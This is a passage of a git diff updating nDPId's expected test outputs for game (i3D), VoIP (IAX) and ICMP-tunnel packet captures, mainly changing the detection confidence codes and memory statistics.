+00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":13434,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1643574967215} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643574967215,"flow_last_seen":1643574967215,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643574967215,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62620,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643574967215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643574967215,"pkt":"eJS0JASgYDjgxTWgCABFAABm4pkAAH8RaQ7AqAJk1aNXL\/Scw1QAUnfBAAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD8U="} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643574967215,"flow_last_seen":1643574967215,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643574967215,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62620,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643574967246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643574967246,"pkt":"YDjgxTWgeJS0JASgCABFAABmqfdAADsRpbDVo1cvwKgCZMNU9JwAUjCJAAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9Jw="} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643574967251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":327,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":327,"pkt_l4_len":293,"thread_ts_msec":1643574967251,"pkt":"eJS0JASgYDjgxTWgCABFAAE54qIAAH8RaDLAqAJk1aNXL\/Scw1QBJQsjkHhO0SCjy\/IAA8+ovt4AAUYE8DbnY+F2hLA62FYWMsCb6Zmw75rsnbyZ4iy2P5qxgVCDbQD+AZr2MnG94xOKLKbJ6e0gLIrOt3dmrdg5D3ID03QQaLQvXVm8Un1iw5E+eIsb41N6KANtFCt71s0VmZrUkf1LNxnlzJAdbzX3KppLCUDo3KeguYqV6SeAD6JVZlW7ZMkhG0EAAY\/U2qeQ551A5yo9KqYr1vJ6hcYhiN7OcJhvYHrjjp03R9P7x15fPzuP7cBcu2mMmA8wMwrmspxIjzzpSS4lDTqWhAn60sO7wZyuA5SeyDvEi2pMQwrzXDhbtJX+LXgP0MdXCc1lEcV9Ir2iPuS\/2W\/B5\/BliP5f54+DI\/oJiIHRkyOA"} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643572927206,"flow_last_seen":1643572927312,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1167,"flow_tot_l4_payload_len":11003,"flow_avg_l4_payload_len":733,"midstream":0,"thread_ts_msec":1643574967460,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":55205,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643575387216,"flow_last_seen":1643575387216,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643575387216,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62461,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1643575387216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643575387216,"pkt":"eJS0JASgYDjgxTWgCABFAABm+ssAAH8RUNzAqAJk1aNXL\/P9w1QAUnF1AAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFrA="} 
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643575387216,"flow_last_seen":1643575387216,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643575387216,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62461,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1643575387247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643575387247,"pkt":"YDjgxTWgeJS0JASgCABFAABmnUdAADsRsmDVo1cvwKgCZMNU8\/0AUjHHAAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8\/0="} 
+02091{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1643575387252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1257,"pkt_l4_len":1223,"thread_ts_msec":1643575387252,"pkt":"eJS0JASgYDjgxTWgCABFAATb+uoAAH8RTEjAqAJk1aNXL\/P9w1QEx3hNkGfzne7YC1wAA8+pvt4AA5jc4dEa3vvziY9kcYPpMt4WdlkUbbeM1oWfSiFwJ9Gt+KvRAAcj3KEWDH6RJJAvuu8Qe4jAgkSp87\/DPCUHEowkb00jtgL68gOggJbq2bOUhU2709PN9NMl14f2gdqo3P7LaeUZ6Kczo1NGb4oR5Rq2JsRtxDejeKEKDNANZ0U7emSTSRs6ze2VDwnZjgXLQcV\/RG3b3aa1WG4gRrNgiy4JzMDV9nuZ848z1UJMG3uWkPJOFWPICxWueRoneHKFK71fBj8nl8Pw9rKumSc6DGP6DDmoThvXOi2Gu+PMh+Chr\/Ogov2r9rE2SRUNXKaTvP14hgG8+MQvAETw\/nePwdZrcsV6Hby\/+MyeTmwsSkXzlPPFayK8FVbY8Kc6+koI7eQEur23CgQz6J3NB3m3LU3v\/a\/\/8uTTDZdWng1y5Vw98wu3YkDw4ru2Y2n\/XwrHIq2qK2FZd6ofJO\/qV\/PPjKC7yN5IuzD310YeflJWyvIIYXt6\/u+mUvYvfJNh4iZTOK20vR+L2dBIiUwFjdEYKmc0FPIODnVQGBcSfv1LCXsHlNZr+XStcvrLr98HYhY0meFs55ERmSx\/fmSBANwJGTM3hIUtN0\/gpzjolNmCQABdt1mQ3NEd9bvyhQ1hITnmxmd+fa2swXfAAq\/h\/JOp\/441cujVp12+CyIOAjMFVniOT3CYOJj6aEi8Zd51GJuNCTW5DlE8jRTJ\/q82Dnob5QYUYF0wwf1JY9p5\/tIaxvJXXL16NjTIGbmIZhRb9FQ8LeDpGie61jCVh\/ukyAu5ikecrOqWjWJ50QwLPhDeh5E+wQ25lQZTIE70OBy12IR\/hqComnchdnvyKfx4YfAHO5vxwN9Jrl2Jof9LDKuDe\/8YtUEUzBojCMK1kwtxVloVQfjp\/mZVJaA1EDZA3PIOG91D1LORdGlkv4AYBtPgAsohRYIAhtjvccy2FjTA3ungXQP6sBv3L+0sx\/071T7RcY4Yh\/wHXUbWmYqbEPVepVfBCp7jzrM0aZwyNsoZBWdq\/OgTcL7tcRja5\/BLQTcEASCB4wDq1WyQldx7RAH4BHaZmdWLHfi2i2Zjx2++DbCrIx+47dpI1\/BpGCcjDClmGcw3eQVsx2jxc4o1RJyqXAPCPVnYXTpQE7Tp1KiwN4RmxSPlODBHmVgPEdYGbLXsNrYGmbV\/gA9n6VjbUEfxHxPpwTjQZ1I8ZUwjRmitozUbQ5\/89EO2tJjhKmTnf1ss0Ec0c+9820t9ZwwG2eAYn6SgYdm5xKZPHzMm1pfbxYVv3HW+rXVcZuz65NVbZAO7XV+k2KjLbHSr3MCKmGxNEvKctjm0V\/gIp2yUki+iEKldLM\/mMJVXjptSYD\/I9+O+W8SdRs3WiBSA9Q1At0qQj8\/nEz6muJbWUSP4z07zGu0eaYbbxvanpEVEjgXukyVL8rHS98M24vJqdC2NmRtMC3vWE9swu6e3KNhXTdPUDxqYDED7pG6UmEOIRKtI65rrIFGVB\/p7AsMMo2Q
WP0q+NXJWJks0PQimoB1PR2dTSwamDuimqPdrTUyw5hwIWP2nZHy1IWOZvKYnAH+Ct\/4EBFBHUuLc+Y+IS2oWiF6+qyWA"} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643575387216,"flow_last_seen":1643575387266,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1216,"flow_tot_l4_payload_len":15953,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1643575387266,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62461,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643574967215,"flow_last_seen":1643574967460,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1210,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1643575387266,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62620,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} 
+00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":33972,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1643575387266} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 60/60 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 33972 bytes +~~ total detected protocols..: 4 +~~ total active/idle flows...: 4/4 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6007997 bytes +~~ total memory freed........: 6007997 bytes +~~ total allocations/frees...: 120948/120948 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 459 chars +~~ json string max len.......: 2096 chars +~~ json string avg len.......: 1240 chars diff --git a/test/results/iax.pcap.out b/test/results/iax.pcap.out index 3c50173ba..4f2e8a0ef 100644 --- a/test/results/iax.pcap.out +++ b/test/results/iax.pcap.out 
@@ -2,10 +2,10 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1123840005963} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1123840005963,"flow_last_seen":1123840005963,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1123840005963,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1123840005963,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1123840005963,"pkt":"AMDwli5rAOCBJ2JwCABFEABeAABAAEARAJ1SbiRUwKgCeBHZEdYASpLMgAQAAAAAAAEAAAYBCwIAAgEMNDQyMDg4MjA1MTU1Agw0NDc3ODIyNjc5NDkEAAoCZW7\/BAAAAAIMAgAAHwQLDFXW"} 
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1123840005963,"flow_last_seen":1123840005963,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1123840005963,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1123840005963,"flow_last_seen":1123840005963,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1123840005963,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1123840005966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1123840005966,"pkt":"AOCBJ2JwAMDwli5rCABFAAAoV7tAAEARqSfAqAJ4Um4kVBHWEdkAFBwTgBcABAAAAAEAAQYE"} 
00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1123840005971,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1123840005971,"pkt":"AOCBJ2JwAMDwli5rCABFAAAoV71AAEARqSXAqAJ4Um4kVBHWEdkAFBwJgBcABAAAAAgAAQYH"} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1123840005963,"flow_last_seen":1123840006489,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":7054,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1123840006489,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"iax.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1123840005963,"flow_last_seen":1123840006489,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":7054,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1123840006489,"l3_proto":"ip4","src_ip":"82.110.36.84","dst_ip":"192.168.2.120","src_port":4569,"dst_port":4566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IAX","breed":"Acceptable","category":"VoIP"}} 
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"iax.pcap","alias":"nDPId-test","packets-captured":50,"packets-processed":50,"total-skipped-flows":0,"total-l4-payload-len":7054,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1123840006489} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 50/50 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870893 bytes -~~ total memory freed........: 5870893 bytes -~~ total allocations/frees...: 118164/118164 +~~ total memory allocated....: 6004527 bytes +~~ total memory freed........: 6004527 bytes +~~ total allocations/frees...: 120926/120926 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 448 chars ~~ json string max len.......: 679 chars diff --git a/test/results/icmp-tunnel.pcap.out b/test/results/icmp-tunnel.pcap.out index 6a367898a..3258fe7b7 100644 --- a/test/results/icmp-tunnel.pcap.out +++ b/test/results/icmp-tunnel.pcap.out 
@@ -2,19 +2,19 @@ 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"icmp-tunnel.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1360227866458} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1360227866459,"flow_last_seen":1360227866459,"flow_idle_time":140000,"flow_min_l4_payload_len":92,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1360227866459,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1360227866459,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1360227866459,"pkt":"AAwpy+OCAAwpzwzBCABFAABwAABAAEABhDTAqJqDwKiahAgAAAD+\/wAARQAAVAAAQABAASPpCl8BAQpfAQIIAFvrPQgAAS1uE1EtSQYACAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1360227866459,"flow_last_seen":1360227866459,"flow_idle_time":140000,"flow_min_l4_payload_len":92,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1360227866459,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.703333} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1360227866459,"flow_last_seen":1360227866459,"flow_idle_time":140000,"flow_min_l4_payload_len":92,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1360227866459,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.703333} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1360227867458,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1360227867458,"pkt":"AAwpy+OCAAwpzwzBCABFAABwAABAAEABhDTAqJqDwKiahAgAAAD+\/wAARQAAVAAAQABAASPpCl8BAQpfAQIIAH3tPQgAAi5uE1EKRgYACAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3"} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1360227868458,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1360227868458,"pkt":"AAwpy+OCAAwpzwzBCABFAABwAABAAEABhDTAqJqDwKiahAgAAAD+\/wAARQAAVAAAQABAASPpCl8BAQpfAQIIAD\/sPQgAAy9uE1FHRgYACAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3"} -00785{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":160,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":147,"flow_first_seen":1360227866459,"flow_last_seen":1360228057029,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":17193,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1360228057029,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":214,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":187,"flow_first_seen":1360227866459,"flow_last_seen":1360228178094,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":30249,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1360228178094,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00786{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":257,"source":"icmp-tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":220,"flow_first_seen":1360227866459,"flow_last_seen":1360228298215,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1041,"flow_tot_l4_payload_len":37116,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1360228298215,"l3_proto":"ip4","src_ip":"192.168.154.131","dst_ip":"192.168.154.132","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
